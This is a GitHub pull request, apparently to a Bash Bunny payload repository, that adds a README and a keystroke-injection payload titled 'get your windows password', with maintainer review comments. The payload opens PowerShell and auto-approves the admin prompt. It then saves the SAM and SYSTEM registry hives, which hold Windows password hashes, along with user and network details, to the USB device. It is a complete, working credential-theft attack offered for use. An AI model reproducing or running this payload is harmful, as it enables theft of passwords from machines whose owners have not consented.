-
Notifications
You must be signed in to change notification settings - Fork 1.5k
get your windows password #701
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
base: master
Are you sure you want to change the base?
Changes from all commits
File filter
Filter by extension
Conversations
Jump to
Diff view
Diff view
There are no files selected for viewing
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,18 @@ | ||
| AUTHOR: AlexanderWyt | ||
| SIDE NOTE: this is just a prototype and I will make a better one later | ||
|
|
||
| HOW IT WORKS: | ||
| It goes into a keyboard and storage. | ||
| Then it turns red. | ||
| Then it opens powershell via the run command. | ||
| Then it closes powershell and makes it run as admin. | ||
| Then it says yes to run as admin. | ||
| Then it writes down the users. (just in case you dont know what the username is (Ik its irelevant)) | ||
| Then it writes down the IPs. (so you know what to connect to) | ||
| Then it writes down the hashes with SAM and SYSTEM. | ||
| DISCLAIMER: this is all wroten down on D:\nothingwashereorwillhappen\ so you need to have a folder with that name on your bash bunny. | ||
|
Member
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Please add a note instructing the end user to make a directory on the BashBunny root directory named |
||
| If there is more than one storage unit change it. (I know this is not the most ethical way but I am gonna fix that in the next verison.) | ||
| Then it exits, minimizes all windows, and the bash bunny disconnects and turns green. | ||
|
|
||
| ANOTHER SIDE NOTE: if you want to know how you can use this go to: (https://www.youtube.com/watch?v=L26Xq7m0uQ0&list=PLTnKEBOD8VBgfdK-nMiS3-oLM6gz3OHEx&) | ||
| and keep in mind this is for fun not for harm | ||
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,28 @@ | ||
| ATTACKMODE HID STORAGE | ||
| LED R | ||
| QUACK GUI r | ||
| QUACK STRING powershell | ||
| QUACK ENTER | ||
| QUACK DELAY 1000 | ||
| QUACK STRING "exit Start-Process powershell -Verb RunAs" | ||
| QUACK ENTER | ||
| QUACK DELAY 2200 | ||
| QUACK ALT Y | ||
| QUACK DELAY 1000 | ||
| QUACK STRING "ipconfig /all | Out-File -FilePath 'D:\nothingwashereorwillhappen\IP.txt'" | ||
|
Member
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Not everyone's BashBunny will mount as This will have powershell use the Just as a example: Please make this change across your payload and be mindful for syntax overlaps. |
||
| QUACK ENTER | ||
| QUACK DELAY 100 | ||
| QUACK STRING "whoamI /all | Out-File -FilePath 'D:\nothingwashereorwillhappen\waitwhoamI.txt'" | ||
| QUACK ENTER | ||
| QUACK DELAY 100 | ||
| QUACK STRING "reg save HKLM\sam D:\nothingwashereorwillhappen\whoisSAManyway.save" | ||
| QUACK ENTER | ||
| QUACK DELAY 100 | ||
| QUACK STRING "reg save HKLM\system D:\nothingwashereorwillhappen\itsSAMSsystem.save" | ||
| QUACK ENTER | ||
| QUACK DELAY 150 | ||
| QUACK STRING "exit" | ||
| QUACK ENTER | ||
| QUACK GUI m | ||
| ATTACKMODE OFF | ||
| LED G | ||
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
This payload seems more fitting inside of the exfiltration category due to its nature. Please move it into that category directory.